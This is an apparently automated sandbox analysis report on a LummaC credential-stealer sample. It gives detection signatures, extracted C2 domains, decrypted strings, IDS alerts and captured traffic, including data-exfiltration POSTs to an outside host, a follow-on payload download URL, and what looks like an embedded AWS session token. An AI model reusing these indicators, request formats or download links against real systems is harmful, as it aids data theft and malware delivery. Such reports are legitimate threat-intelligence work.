Windows Analysis Report
jSFUzuYPG9.exe

Overview

General Information

Sample name:	jSFUzuYPG9.exe renamed because original name is a hash value
Original sample name:	820f418e980b172684fe96e4aa6e50a5.exe
Analysis ID:	1579761
MD5:	820f418e980b172684fe96e4aa6e50a5
SHA1:	a5498979325229c5494a01fddd7e8013750a5ce7
SHA256:	06472667e63bfd7ffdf64b3de9b839207e2b0ab1ae17d60f6a6ad75d6fbd2800
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Detected potential crypto function

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: jSFUzuYPG9.exe

Avira: detected

Found malware configuration

Source: jSFUzuYPG9.exe.7428.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: jSFUzuYPG9.exe	ReversingLabs: Detection: 63%
Source: jSFUzuYPG9.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: jSFUzuYPG9.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sweepyribs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Uses 32bit PE files

Source: jSFUzuYPG9.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Directory queried: number of queries: 1001

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.11:63590 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.11:60253 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.11:65433 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.11:51180 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.11:60277 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.11:58057 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.11:55218 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.11:50665 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.11:54667 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49733 -> 104.21.66.86:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: sweepyribs.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49733 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49748 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49772 -> 185.166.143.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49739 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49755 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49777 -> 52.216.152.124:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HHOEN70NKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G0ZRODU1MVEYOKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VSKU0NU9BAG1J2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20410Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FFVY7DHX236User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1209Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2LZ5UATFIAIX09User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588109Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Per equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: p.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https:// equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic	DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic	DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic	DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic	DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic	DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic	DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
